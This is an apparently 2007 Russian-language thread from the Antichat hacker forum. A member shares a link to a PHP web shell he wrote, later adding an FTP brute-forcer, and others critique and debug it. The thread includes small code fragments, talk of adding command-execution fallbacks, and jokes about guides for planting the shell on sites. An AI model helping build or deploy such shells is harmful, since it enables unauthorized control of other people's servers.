Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   шелл от меня=) (https://forum.antichat.xyz/showthread.php?t=37690)

GreenBear 11.04.2007 18:33

шелл от меня=)
 
в общем тут традиция делать шеллы , а я так посмотрел ни разу не сделал =\
естественно онли пост
http://netsec.ru/gb_old/src/shell.phps

x-treem 11.04.2007 19:18

похож на шелл ак74
а по делу...
что за тёмносерый текст на светлосером фоне???
пощади глаза

blackybr 11.04.2007 20:54

В окне листинга неплохо бы сделать выравнивание по колонкам вывода .. сейчас просмотр листинга немного затруднен )
алиасы... мм.. да в принципе не вижу смысла искать конфиг.инк.пхп ))) + ты еще и по маске конфиги ищещь..

GreenBear 11.04.2007 20:56

ну вообще то я не ищу
просто добавил из р57 =\
как и шелами я тоже не пользуюсь)
про цвета букв - имхо нормально видно

Goudini 11.04.2007 21:05

фигово в сейфмоде работает, и в винде вообще
Код:

Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode

Isis 11.04.2007 22:20

Так если safe-mode, то
PHP код:

max_execution_time(0); 


nc.STRIEM 11.04.2007 22:20

молодец! все просто и ясно, без наворотов)

ps напиши еще подробный манул по его заливке)))

n1†R0x 11.04.2007 22:48

Цитата:

Сообщение от nc.STRIEM
молодец! все просто и ясно, без наворотов)

ps напиши еще подробный манул по его заливке)))

норм) поюзаем..

да-да, по заливке для каждого форума/цмс, а то че с ним делать :confused: :p

GreenBear 12.04.2007 00:09

Обновил.)

x-treem 12.04.2007 08:09

Цитата:

Сообщение от GreenBear
Обновил.)


Так получше будет.

Isis 12.04.2007 08:20

GreenBear, если сейф мод включен, то будет не корректно пахать
Напиши еще так
PHP код:

 max_execution_time(0); 


hidden 13.04.2007 12:04

Критика :)
 
Первое с чем я столкнулся, то что шелл у тебя в UTF-8, а сервер netsec'a отвечает:
Код:

Content-Type: text/html; charset=windows-1251
Код:

if($_POST['download']){
    header(
'Content-Length:'.filesize('/tmp/'.$_POST['download'].'.sql').' ');
    header(
'Content-Type: application/octet-stream');
    header(
"Content-Disposition: attachment; filename={$_POST['download']}.sql");
    readfile(
'/tmp/'.$_POST['download'].'.sql');
    die();
}

$_POST[
'dir'] ? $dir = $_POST['dir'] : $dir = getcwd();
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);

Как насчёт убрать слэши из переменных до использования последних?

хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu

ИМХО, яркий действительно глаза напрягает.

Про js, который не нужен я ничего говорить не буду.))

Кстати, не пробовал его проинклудить не первым? Как выглядит?

А вот вопрос, уже давно меня интересует:
Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?

GreenBear 13.04.2007 20:00

Цитата:

Как насчёт убрать слэши из переменных до использования последних?
ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )
Цитата:

хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu
если чесно то тоже не вижу смысла.
Цитата:

Про js, который не нужен я ничего говорить не буду.))
мне так удобнее делать =\
Цитата:

Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?
автоматом.

hidden 13.04.2007 22:23

Цитата:

Сообщение от GreenBear
ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )

Нет, чтоб не получались вот такие пути "C:\\\\\\\\www\\\\\\\\http\\\\\\\\"

Цитата:

Сообщение от GreenBear
если чесно то тоже не вижу смысла.

Просто некоторые функции бывают отключены, а про другие забывают.

GreenBear 13.04.2007 22:40

ну где выключен попен, там и все другие типа систем, ексек тоже =\ в основном. добавить не сложно конечно, но смысла не вижу)

GreenBear 22.04.2007 19:17

Обновление.
Добавлен фтп брут
качать там же

Boccob 24.05.2007 12:50

ОШИБКА
Запрошенный Url не может быть доставлен

Это только у меня так?

-=lebed=- 24.05.2007 13:00

Цитата:

Сообщение от Boccob
ОШИБКА
Запрошенный Url не может быть доставлен

Это только у меня так?

нет, сайт не доступен Гринбира...

GreenBear 24.05.2007 23:32

http://netsec.ru/gb_old/src/shell.phps

ultimatum 24.05.2007 23:52

спасибо молодец, пользуюсь ак57, но твой тоже придёться затестить )))

+

меня почему-то постоянно куда ненажимаю бросает на страничку с логином и пассом .Набираю test и всё ровно.
Тест провожу на винде
И на хосте под линухой такая же ботва.Хост на агаве

GreenBear 25.05.2007 10:23

cними авторизацию

ultimatum 25.05.2007 11:36

// username, password, auth
// $info['username'] = 'test';
// $info['password'] = 'test';
// $info['auth'] = true;

я просто закоментировал , но теперь он просто ничего не делает

GreenBear 25.05.2007 11:39

закоментируй error_reporting(0);
и посмотри чего пишет ..
я хз чего у тебя там не работает.

ultimatum 25.05.2007 11:45

PHP код:


Warning
session_start() [function.session-start]: Cannot 
send session cookie 
headers already sent by (output 
started at C
:\AppServ\www\she.php:1in 
C
:\AppServ\www\she.php on line 16

Warning
session_start() [function.session-start]: Cannot 
send session cache limiter 
headers already sent (output 
started at C
:\AppServ\www\she.php:1in 
C
:\AppServ\www\she.php on line 16 

-----------------------------------------------

вот инфа по машине
Server info:
OS: , Software: Apache/2.2.2 (Win32) PHP/5.1.4
PHP Version: 5.1.4, Safe mode: Off
Disabled Functions: false
MySQL: On, MSSQL: Off, Oracle: Off


-------------------------------

16 строчка
PHP код:


session_start
(); 


GreenBear 25.05.2007 13:03

пробелов перед <?php
не стоит?

он кстате под виднус не предназначен )

ultimatum 25.05.2007 13:16

Цитата:

пробелов перед <?php
не стоит?
А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Раз он предназначен под никсы, значит буду тэстить под никсы.А под винду буду другой шел использовать.
Всё ровно ГринБир молодец,спасибо.

GreenBear 25.05.2007 13:35

хидеры не могу быть посланы после вывода кода страницы.

Helios 25.05.2007 13:58

2ultimatum

У многих редакторов при сохранении в юникоде есть манера впихивать в начало файла три злочастных байта, которые могут подпортить жизнь программисту.

Цитата:

А причем здесь пробел, если бы php код не рабортал на машине, то сорц бы лез на ружу.
Подучи спецификации HTTP, тогда поймешь, почему, выдав хоть один байт в теле ответа, апач больге не может добавить ни один хидер, в данном случае set-cookie.


Время: 04:45